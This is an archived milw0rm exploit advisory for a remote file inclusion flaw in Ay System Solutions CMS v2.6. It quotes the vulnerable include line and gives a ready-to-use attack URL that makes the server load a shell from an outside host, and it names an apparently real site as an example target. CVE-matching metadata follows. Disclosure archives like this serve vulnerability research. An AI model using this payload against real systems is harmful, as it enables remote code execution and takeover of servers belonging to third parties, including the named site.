#============================================================================================== #Ay System Solutions CMS <= v2.6 (main.php) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://www.aysad.net/ # #Version : 2.6 # #================================================================================================ #Bug in : manage/template/standard/main.php # #Vlu Code : #-------------------------------- # <? # include($path["ShowProcessHandle"]); # ?> # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/manage/template/standard/main.php?path[ShowProcessHandle]=http://SHELLURL.COM? # #Example : http://site.turkradyosu.com # # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior ================================================================================================== # milw0rm.com [2006-08-27]
Related Exploits
Trying to match CVEs (2): CVE-2006-4440, CVE-2006-4441Trying to match OSVDBs (3): 28245, 28246, 28247
Other Possible E-DB Search Terms: Ay System CMS 2.6, Ay System CMS
Date | D | V | Title | Author | No matches |
---|